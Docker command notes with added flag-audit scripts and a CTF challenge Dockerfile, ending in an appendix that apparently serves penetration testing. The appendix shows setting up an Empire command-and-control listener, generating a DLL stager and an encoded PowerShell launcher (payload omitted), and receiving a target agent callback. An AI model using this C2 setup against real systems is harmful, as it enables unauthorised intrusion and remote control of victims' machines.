Docker Notes

Concepts

Docker image: a read-only template that is the basis for creating Docker containers. An image file is made up of multiple layers.

Docker container: a lightweight sandbox used to run and isolate an application.

Docker registry: where Docker image files are stored.

Docker identifies images and containers either by id or by name:tag.

Installation

Official documentation: https://docs.docker.com/

Working with images

1. Pulling an image (by default images are pulled from Docker Hub)

docker pull kalilinux/kali-linux-docker
# to pull from a non-official registry, give the registry's full address
docker pull hub.c.163.com/public/ubuntu:14.04

Tip: use the USTC mirror https://docker.mirrors.ustc.edu.cn

Related: the right way to run docker build from within China

2. Listing images

➜  ~ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
kalilinux/kali-linux-docker latest 8ececeaf404d 9 months ago 1.56GB

REPOSITORY: the repository the image comes from

TAG: the image's tag, which distinguishes different images from the same repository

IMAGE ID: the image's id; this field uniquely identifies the image

CREATED: creation time

SIZE: size of the image

3. Adding an image tag

# add the new tag kalilinux:latest to kalilinux/kali-linux-docker:latest
➜ ~ docker tag kalilinux/kali-linux-docker:latest kalilinux:latest
# the names differ, but both refer to the same image file (same id)
➜ ~ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
kalilinux/kali-linux-docker latest 8ececeaf404d 9 months ago 1.56GB
kalilinux latest 8ececeaf404d 9 months ago 1.56GB

4. Viewing image details

➜  ~ docker inspect kalilinux:latest
[
{
"Id": "sha256:8ececeaf404d5d63d4e9bf870f4340516f3be040e5db6c005ac8cf96d2c43536",
"RepoTags": [
"kalilinux/kali-linux-docker:latest",
"kalilinux:latest"
],
"RepoDigests": [
"kalilinux/kali-linux-docker@sha256:2ebc75f51fa4937340a0d3b4fe903c60aad23866b8c9e1fae80ad7372e01b71d"
],
......
"Metadata": {
"LastTagTime": "2017-12-02T04:56:53.8185955Z"
}
}
]

5. Viewing image history

➜  ~ docker history kalilinux:latest
IMAGE CREATED CREATED BY SIZE COMMENT
8ececeaf404d 9 months ago /bin/sh -c #(nop) CMD ["/bin/bash"] 0B
<missing> 9 months ago /bin/sh -c apt-get -y update && apt-get -y... 251MB
<missing> 9 months ago /bin/sh -c #(nop) ENV DEBIAN_FRONTEND=non... 0B
<missing> 9 months ago /bin/sh -c echo "deb http://http.kali.org/... 134B
<missing> 9 months ago /bin/sh -c #(nop) MAINTAINER steev@kali.org 0B
<missing> 11 months ago /bin/sh -c #(nop) CMD ["/bin/bash"] 0B
<missing> 11 months ago /bin/sh -c apt-get -y update && apt-get -y... 286MB

6. Searching for images

# search for automated-build images with "kali" in the name and 3 or more stars
➜ ~ docker search --automated -s 3 kali
Flag --automated has been deprecated, use --filter=is-automated=true instead
Flag --stars has been deprecated, use --filter=stars=3 instead
NAME DESCRIPTION STARS OFFICIAL AUTOMATED
kalilinux/kali-linux-docker Kali Linux Rolling Distribution Base Image 361 [OK]
linuxkonsult/kali-metasploit Kali base image with metasploit 54 [OK]
jasonchaffee/kali-linux Kali Linux Docker Container with the kali-... 8 [OK]
brimstone/kali 6 [OK]
adamoss/kali2-metasploit Kali2 Automated Build 4 [OK]
wsec/kali-metasploit Official Kali Base image + Metasploit 3 [OK]
kalinon/comicstreamer ComicStreamer is a media server app for sh... 3 [OK]

7. Deleting images

# if an image has several tags, docker rmi name:tag only removes that tag
# docker rmi id removes all of the image's tags first and then the image itself
# an image whose containers still exist cannot be removed; docker rmi -f id forces removal
➜ ~ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
kalilinux/kali-linux-docker latest 8ececeaf404d 9 months ago 1.56GB
kalilinux latest 8ececeaf404d 9 months ago 1.56GB
➜ ~ docker rmi kalilinux/kali-linux-docker:latest
Untagged: kalilinux/kali-linux-docker:latest
Untagged: kalilinux/kali-linux-docker@sha256:2ebc75f51fa4937340a0d3b4fe903c60aad23866b8c9e1fae80ad7372e01b71d
➜ ~ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
kalilinux latest 8ececeaf404d 9 months ago 1.56GB

8. Creating images

1) From a container based on an existing image

# first create a container and install metasploit-framework in it
➜ ~ docker run -it kalilinux:latest /bin/bash
root@de573c5f5dc6:/# apt update && apt install metasploit-framework
root@de573c5f5dc6:/# exit
# note the container id: de573c5f5dc6
# docker commit -m "change description" -a "author name" id REPOSITORY:TAG
➜ ~ docker commit -m "install msf" -a "zeroyu" de573c5f5dc6 kalilinux:0.1
sha256:66a6770d79d88c826b2e4a38b98037c14de0b9d2ce897307dc30afbf675ce51a
➜ ~ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
kalilinux 0.1 66a6770d79d8 21 seconds ago 2.54GB
kalilinux latest 8ececeaf404d 9 months ago 1.56GB

2) Importing from a local template

docker import ...

9. Saving and loading images

1) Saving an image

docker save -o docker_for_msf.tar kalilinux:0.1

2) Loading an image

docker load --input docker_for_msf.tar
# or
docker load < docker_for_msf.tar

10. Pushing an image

docker push kalilinux:0.1

Working with containers

1. Creating containers

1) Creating a new container

# a container created with docker create is stopped; use docker start to start it
# -i keeps stdin open, -t allocates a pseudo-terminal
➜ ~ docker create -it kalilinux:0.1
2bc48b88a424c8056fe9e6311848d5850c4e46008feec99ee095bc341ae9adaf
# list containers including stopped ones
➜ ~ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
2bc48b88a424 kalilinux:0.1 "/bin/bash" 7 seconds ago Created frosty_poitras
de573c5f5dc6 kalilinux:latest "/bin/bash" 5 hours ago Exited (0) 5 hours ago happy_goldberg

2) Starting a container

# docker start id starts the given container
# docker ps lists running containers
➜ ~ docker start 2bc48b88a424
2bc48b88a424
➜ ~ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
2bc48b88a424 kalilinux:0.1 "/bin/bash" 9 minutes ago Up 8 seconds frosty_poitras

3) Creating and starting a container in one step

# docker run = docker create + docker start
# what run does: 1. check whether the image exists locally and download it if not; 2. create a container from the image and mount a read-write layer on top; 3. allocate a virtual interface;
# 4. allocate an IP address; 5. run the specified program; 6. stop automatically when the program exits
➜ ~ docker run kalilinux:0.1 /bin/echo 'zeroyu'
zeroyu
➜ ~ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
d6a6045c4f8b kalilinux:0.1 "/bin/echo zeroyu" 3 minutes ago Exited (0) 3 minutes ago cocky_kirch
➜ ~ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
# the usual interactive form
➜ ~ docker run -it kalilinux:0.1 /bin/bash
root@2ed8aa5354f1:/# ps
PID TTY TIME CMD
1 pts/0 00:00:00 bash
7 pts/0 00:00:00 ps
root@2ed8aa5354f1:/# exit
exit
# after exiting, the container is automatically in the stopped state
➜ ~ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
2ed8aa5354f1 kalilinux:0.1 "/bin/bash" About a minute ago Exited (0) 48 seconds ago goofy_bardeen

4) Running in detached (daemon) mode

# run the container in the background
➜ ~ docker run -d kalilinux:0.1 /bin/sh -c "while true ; do echo zeroyu ; sleep 1 ; done"
88f12c0725a466ba6d8f08f34fc8e9ac263ecafdff0a9e7282d7e9bb4073e6a0
➜ ~ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
88f12c0725a4 kalilinux:0.1 "/bin/sh -c 'while..." 7 seconds ago Up 7 seconds sleepy_kowalevski
➜ ~ docker logs 88f12c0725a4
zeroyu
zeroyu
zeroyu
......

2. Stopping containers

# the id is 88f12c0725a4, but any unique prefix of it is enough
➜ ~ docker stop 88
88
# list the ids of all containers, stopped ones included (-q prints ids only, -a includes stopped containers)
➜ ~ docker ps -qa
073ff4e1dac7
# a stopped container can be started again with start
➜ ~ docker start 073
073
➜ ~ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
073ff4e1dac7 kalilinux:0.1 "/bin/sh -c 'while..." About a minute ago Up About a minute cranky_benz
# restart stops the container and then starts it again
➜ ~ docker restart 073
073

3. Entering a container

A container started in detached mode (the -d flag) runs in the background, but you cannot see its output or interact with it. To work inside such a container, use the attach or exec command.

1) Using the attach command

# a container can also be identified uniquely by its name
➜ ~ docker run -itd kalilinux:0.1
77e93d18a6a547c85d86925a0bf3c4ae734eec6fe235ae1c3fe0f19822f14360
➜ ~ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
77e93d18a6a5 kalilinux:0.1 "/bin/bash" 20 seconds ago Up 21 seconds stupefied_gates
➜ ~ docker attach stupefied_gates
root@77e93d18a6a5:/#

2) Using the exec command

➜  ~ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
77e93d18a6a5 kalilinux:0.1 "/bin/bash" 5 minutes ago Exited (0) About a minute ago stupefied_gates
➜ ~ docker start 77e
77e
➜ ~ docker exec -it 77e93d18a6a5 /bin/bash
root@77e93d18a6a5:/#

4. Removing containers

➜  ~ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
77e93d18a6a5 kalilinux:0.1 "/bin/bash" 7 minutes ago Up About a minute stupefied_gates
➜ ~ docker rm 77e93d18a6a5
Error response from daemon: You cannot remove a running container 77e93d18a6a547c85d86925a0bf3c4ae734eec6fe235ae1c3fe0f19822f14360. Stop the container before attempting removal or force remove
➜ ~ docker stop 77e93d18a6a5
77e93d18a6a5
➜ ~ docker rm 77e93d18a6a5
77e93d18a6a5

5. Exporting and importing containers

# export a container
# a container can be exported whether or not it is running
➜ ~ docker export -o test.tar 77e93d18a6a5
# or equivalently
➜ ~ docker export 77e93d18a6a5 > test.tar

# import the exported filesystem as a new image (docker import takes the file followed by REPOSITORY[:TAG])
➜ ~ docker import test.tar test/kalilinux:v1.0

Docker data management

# use -v to mount the host's /tmp directory at /opt/tmp_test inside the container
# rw (the default) makes the mount read-write
# the # below is the container's shell prompt, not a comment
➜ ~ docker run -it -P --name db -v /tmp:/opt/tmp_test:rw kalilinux:0.1 /bin/sh
# ls
bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
# cd opt
# ls
tmp_test
# cd tmp_test
# ls
com.apple.launchd.0fGM76e6ao com.apple.launchd.UWfVYRXkwo powerlog
com.apple.launchd.AkQGotnulN pip-FfQw68-unpack zeroyu.txt
#

Docker port mapping

# -P publishes the container's exposed ports on random host ports
# -p hostport:containerport (e.g. 8080:80 means 0.0.0.0:8080:80) publishes the container port on that host port on all host addresses
➜ ~ docker run -it -d -p 5000:5000 kalilinux:v0.2
23e91a40cb124720b1dba81371a275169124cbff2778120b4350470fa79a0d91
➜ ~ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
23e91a40cb12 kalilinux:v0.2 "/bin/bash" 12 seconds ago Up 11 seconds 0.0.0.0:5000->5000/tcp boring_volhard
➜ ~ docker attach boring_volhard
root@23e91a40cb12:/# cd home/Empire/
root@23e91a40cb12:/home/Empire# ls
LICENSE README.md changelog data empire lib setup
root@23e91a40cb12:/home/Empire#
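The two sections above show a bind mount of the host's /tmp with rw and a -p mapping that lands on 0.0.0.0. As an added example (not from the original notes), the script below audits the -v and -p flags of a docker run command line and prints the more restrictive form; it is plain sh + awk and runs without Docker, and the command lines it is fed are constructed samples.

```shell
#!/bin/sh
# Added example, not part of the original notes: audit the -v and -p flags of a
# "docker run" command line as the two sections above use them. Pure sh + awk,
# so it runs without Docker; the command lines at the bottom are constructed.

# audit_run_flags "<docker run ...>"
# Prints one finding per line; returns 1 if anything was flagged, else 0.
audit_run_flags() {
    printf '%s\n' "$1" | tr ' ' '\n' | awk '
        # -v /host:/container[:opts]; rw is the default when opts is absent
        (prev == "-v" || prev == "--volume") && $0 ~ /^\// {
            n = split($0, f, ":")
            if (n == 2 || f[3] !~ /(^|,)ro(,|$)/) {
                print "volume " $0 ": host path " f[1] " is writable from the container; use " f[1] ":" f[2] ":ro unless the container must write to it"
                found = 1
            }
        }
        # -p [ip:]hostport:containerport; without an ip it binds 0.0.0.0 (every interface)
        (prev == "-p" || prev == "--publish") {
            n = split($0, f, ":")
            if (n == 2 || (n == 3 && f[1] == "0.0.0.0")) {
                print "publish " $0 ": exposed on all interfaces; use 127.0.0.1:" f[n-1] ":" f[n] " to keep it local"
                found = 1
            }
        }
        $0 == "-P" {
            print "-P: every EXPOSEd port is published on a random host port on all interfaces"
            found = 1
        }
        { prev = $0 }
        END { exit found ? 1 : 0 }
    '
}

# Demo on command lines modelled on the notes above (constructed, no Docker needed)
if [ "${1:-}" = "--demo" ]; then
    for cmd in \
        "docker run -it -P --name db -v /tmp:/opt/tmp_test:rw kalilinux:0.1 /bin/sh" \
        "docker run -it -d -p 5000:5000 kalilinux:v0.2" \
        "docker run -d -p 127.0.0.1:5000:5000 -v /tmp:/opt/tmp_test:ro kalilinux:v0.2"; do
        echo "== $cmd"
        audit_run_flags "$cmd" || echo "   -> review before running"
    done
fi
```

Run it as `sh audit.sh --demo` to see the findings for the three sample command lines; the third one produces none.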

Dockerfile

Basic Dockerfile instructions

FROM <image:tag>: the image is built on top of the named base image; the colon introduces the tag, e.g. node:8.4 would be version 8.4 of node.

MAINTAINER <name> <email>: the image's creator, with name and email.

COPY . [directory]: copy everything in the current directory (except paths excluded by .dockerignore) into directory inside the image.

ADD <src> <dest>: copy files and directories from the build context (and files given as a URL) into the image. Unlike COPY, ADD automatically extracts archives and can fetch remote files. A destination path that does not exist is created automatically.

WORKDIR [directory]: set directory as the working directory for the instructions that follow.

RUN [cmd]: run [cmd] (in the working directory, /app in the example this description was taken from) to install dependencies. Note that everything installed is baked into the image file.

EXPOSE [port]: declare that the container listens on port so it can be published; this takes effect with docker run -p.

VOLUME ["path"]: create a mount on the host and attach it at the given path inside the container. docker run -v does the same and is more flexible: VOLUME cannot choose which host folder is mounted into the container, whereas docker run -v can, and it can also mount data containers.

CMD [cmd]: run [cmd] automatically when the container starts (only one CMD takes effect).

ENV <key> <value>: set one environment variable in the container; it is available to the RUN instructions that follow and is kept when the container runs.

A Dockerfile example from a CTF

# Hitcon 2017 web baby^h-master-php-2017
#
# read_secret prints OrangeOrangeOrange
# MaxConnectionsPerChild is 100
# the rest of the environment is roughly the same as the challenge
# to change the root and challenge user passwords, enter the container with [docker exec -it '<your app name>' /bin/bash]

# apache + php7 base image
FROM pr0ph3t/lap7
MAINTAINER Pr0ph3t <1415314884@qq.com>

#Install crontab and perl with LWP
RUN apt-get update -y && apt-get install cron -y

# Init crontab: empty the data folder every day at 04:00
RUN echo '0 4 * * * root rm -rf /var/www/data/*' >> /etc/crontab

#Init challenge
ADD index.php /var/www/html/
ADD readflag /read_flag
ADD read_secret /read_secret
ADD avatar-1.gif /var/www/html/avatar.gif

RUN chmod u+s /read_flag
RUN rm -rf /var/www/html/index.html
RUN mkdir /var/www/data
RUN chown www-data /var/www/data
RUN chmod -R 775 /var/www/data
RUN echo 'hitcon{Th3 d4rk fl4m3 PHP Mast3r}' > /flag
RUN chmod 700 /flag

#Configure the apache2
RUN sed 's/Indexes //' /etc/apache2/apache2.conf > /etc/apache2/apache2.conf.new
RUN sed 's/MaxConnectionsPerChild 0/MaxConnectionsPerChild 100/' /etc/apache2/mods-available/mpm_prefork.conf > /etc/apache2/mods-available/mpm_prefork.conf.new
RUN mv /etc/apache2/apache2.conf.new /etc/apache2/apache2.conf
RUN mv /etc/apache2/mods-available/mpm_prefork.conf.new /etc/apache2/mods-available/mpm_prefork.conf
RUN echo '<Directory "/var/www/data">\n\tphp_flag engine off\n</Directory>' >> /etc/apache2/sites-enabled/000-default.conf

#Create run.sh
ADD run.sh /
RUN chmod +x /run.sh


#Expose http service
EXPOSE 80
# exec form takes one argument per element; a single "bash -x /run.sh" string would be looked up as a binary of that name
CMD ["bash", "-x", "/run.sh"]
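The instruction descriptions above (ADD versus COPY, CMD) and the challenge Dockerfile give a few things worth checking before building. As an added example that is neither the notes' nor the challenge author's code, the script below runs a small review over a Dockerfile: ADD with a URL or archive source, an exec-form CMD written as one quoted string (which would try to run a binary literally named "bash -x /run.sh"), setuid/setgid bits set with chmod, and a missing USER instruction. The sample Dockerfile it writes is a constructed excerpt modelled on the one above; the URL in it is a placeholder.

```shell
#!/bin/sh
# Added example (not from the original notes or the challenge author):
# a small Dockerfile review in plain sh + awk for the points discussed above.

# lint_dockerfile <path>: prints one finding per line, prefixed "<lineno>:"
lint_dockerfile() {
    awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        { instr = toupper($1) }
        # ADD fetches URLs and unpacks archives silently; COPY does neither
        instr == "ADD" && ($2 ~ /^https?:\/\// || $2 ~ /\.(tar|tgz|gz|bz2|xz|zip)$/) {
            print NR ": ADD " $2 " fetches/extracts automatically; use COPY or an explicit, verified download"
        }
        # exec-form CMD must be one element per argument
        instr == "CMD" && $0 ~ /^[[:space:]]*CMD[[:space:]]*\[/ {
            body = $0; sub(/^[^[]*\[/, "", body); sub(/\].*$/, "", body)
            if (body ~ /^"[^"]* [^"]*"$/)
                print NR ": CMD exec form with one quoted string; split it, e.g. [\"bash\", \"-x\", \"/run.sh\"]"
        }
        # chmod u+s / 4xxx etc. bake a setuid or setgid binary into the image
        instr == "RUN" && $0 ~ /chmod[[:space:]]+([ugo]*\+s|[2467][0-7][0-7][0-7])/ {
            print NR ": setuid/setgid bit set in the image; confirm the binary is meant to run with elevated rights"
        }
        instr == "USER" { has_user = 1 }
        END { if (!has_user) print "0: no USER instruction; processes run as root inside the container" }
    ' "$1"
}

# write_sample <path>: constructed excerpt modelled on the challenge Dockerfile above
write_sample() {
    cat > "$1" <<'EOF'
FROM pr0ph3t/lap7
RUN apt-get update -y && apt-get install cron -y
ADD readflag /read_flag
ADD https://example.invalid/tools.tar.gz /opt/
RUN chmod u+s /read_flag
RUN chmod 700 /flag
EXPOSE 80
CMD ["bash -x /run.sh"]
EOF
}

# Stand-alone demo: sh lint.sh --demo
if [ "${1:-}" = "--demo" ]; then
    f="$(mktemp)"; write_sample "$f"; lint_dockerfile "$f"; rm -f "$f"
fi
```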

Using the Dockerfile

cd into the directory containing the Dockerfile
[docker build -t '<custom image name>' . ]   // don't forget the trailing .
[docker run -id --name '<your app name>' -p <external port>:80 -m '<memory limit, e.g. 1g or 500m>' '<your custom image name>' /run.sh]

Appendix: a worked example

Running Empire for a penetration test inside Docker on a VPS (the same applies to Metasploit)

# for the port mapping, see the previous section
================================================================
[Empire] Post-Exploitation Framework
================================================================
[Version] 2.3 | [Web] https://github.com/empireProject/Empire
================================================================

_______ .___ ___. .______ __ .______ _______
| ____|| \/ | | _ \ | | | _ \ | ____|
| |__ | \ / | | |_) | | | | |_) | | |__
| __| | |\/| | | ___/ | | | / | __|
| |____ | | | | | | | | | |\ \----.| |____
|_______||__| |__| | _| |__| | _| `._____||_______|


282 modules currently loaded

0 listeners currently active

0 agents currently active


(Empire) > help

Commands
========
agents Jump to the Agents menu.
creds Add/display credentials to/from the database.
exit Exit Empire
help Displays the help menu.
interact Interact with a particular agent.
list Lists active agents or listeners.
listeners Interact with active listeners.
load Loads Empire modules from a non-standard folder.
preobfuscate Preobfuscate PowerShell module_source files
reload Reload one (or all) Empire modules.
reset Reset a global option (e.g. IP whitelists).
resource Read and execute a list of Empire commands from a file.
searchmodule Search Empire module names/descriptions.
set Set a global option (e.g. IP whitelists).
show Show a global option (e.g. IP whitelists).
usemodule Use an Empire module.
usestager Use an Empire stager.

(Empire) > list
(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info

Name: HTTP[S]
Category: client_server

Authors:
@harmj0y

Description:
Starts a http[s] listener (PowerShell or Python) that uses a
GET/POST approach.

HTTP[S] Options:

Name Required Value Description
---- -------- ------- -----------
SlackToken False Your SlackBot API token to communicate with your Slack instance.
ProxyCreds False default Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
KillDate False Date for the listener to exit (MM/dd/yyyy).
Name True http Name for the listener.
Launcher True powershell -noP -sta -w 1 -enc Launcher string.
DefaultDelay True 5 Agent delay/reach back interval (in seconds).
DefaultLostLimit True 60 Number of missed checkins before exiting
WorkingHours False Hours for the agent to operate (09:00-17:00).
SlackChannel False #general The Slack channel or DM that notifications will be sent to.
DefaultProfile True /admin/get.php,/news.php,/login/ Default communication profile for the agent.
process.php|Mozilla/5.0 (Windows
NT 6.1; WOW64; Trident/7.0;
rv:11.0) like Gecko
Host True http://172.17.0.2:80 Hostname/IP for staging.
CertPath False Certificate path for https listeners.
DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0).
Proxy False default Proxy to use for request (default, none, or other).
UserAgent False default User-agent string to use for the staging request (default, none, or other).
StagingKey True 3ab47284cf7e260541d810beb54d3405 Staging key for initial agent negotiation.
BindIP True 0.0.0.0 The IP to bind to on the control server.
Port True 80 Port for the listener.
ServerVersion True Microsoft-IIS/7.5 Server header for the control server.
StagerURI False URI for the stager. Must use /download/. Example: /download/stager.php


(Empire: listeners/http) > set Name docker
# 172.16.188.1 here is the VPS's IP address
(Empire: listeners/http) > set Host http://172.16.188.1:5000
(Empire: listeners/http) > execute
[*] Starting listener 'docker'
[+] Listener successfully started!
(Empire: listeners/http) > lsit
*** Unknown syntax: lsit
(Empire: listeners/http) > back
(Empire: listeners) > list

[*] Active listeners:

Name Module Host Delay/Jitter KillDate
---- ------ ---- ------------ --------
docker http http://172.16.188.1:5000 5/0.0

(Empire: listeners) > usestager
multi/bash osx/dylib osx/teensy windows/launcher_sct
multi/launcher osx/jar windows/bunny windows/launcher_vbs
multi/pyinstaller osx/launcher windows/dll windows/macro
multi/war osx/macho windows/ducky windows/macroless_msword
osx/applescript osx/macro windows/hta windows/teensy
osx/application osx/pkg windows/launcher_bat
osx/ducky osx/safari_launcher windows/launcher_lnk
(Empire: listeners) > usestager windows/d
dll ducky
(Empire: listeners) > usestager windows/dll
(Empire: stager/windows/dll) > info

Name: DLL Launcher

Description:
Generate a PowerPick Reflective DLL to inject with
stager code.

Options:

Name Required Value Description
---- -------- ------- -----------
Listener True Listener to use.
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
Obfuscate False False Switch. Obfuscate the launcher
powershell code, uses the
ObfuscateCommand for obfuscation types.
For powershell only.
Proxy False default Proxy to use for request (default, none,
or other).
Language True powershell Language of the stager to generate.
OutFile True /tmp/launcher.dll File to output dll to.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Arch True x64 Architecture of the .dll to generate
(x64 or x86).
ObfuscateCommand False Token\All\1 The Invoke-Obfuscation command to use.
Only used if Obfuscate switch is True.
For powershell only.
StagerRetries False 0 Times for the stager to retry
connecting.


(Empire: stager/windows/dll) > set Listener docker
(Empire: stager/windows/dll) > back
(Empire: listeners) > launcher powershell docker
powershell -noP -sta -w 1 -enc <payload omitted>
# running the payload above on the target machine produces the callback below
(Empire: listeners) > [+] Initial agent G3BYNCLW from 172.17.0.1 now active (Slack)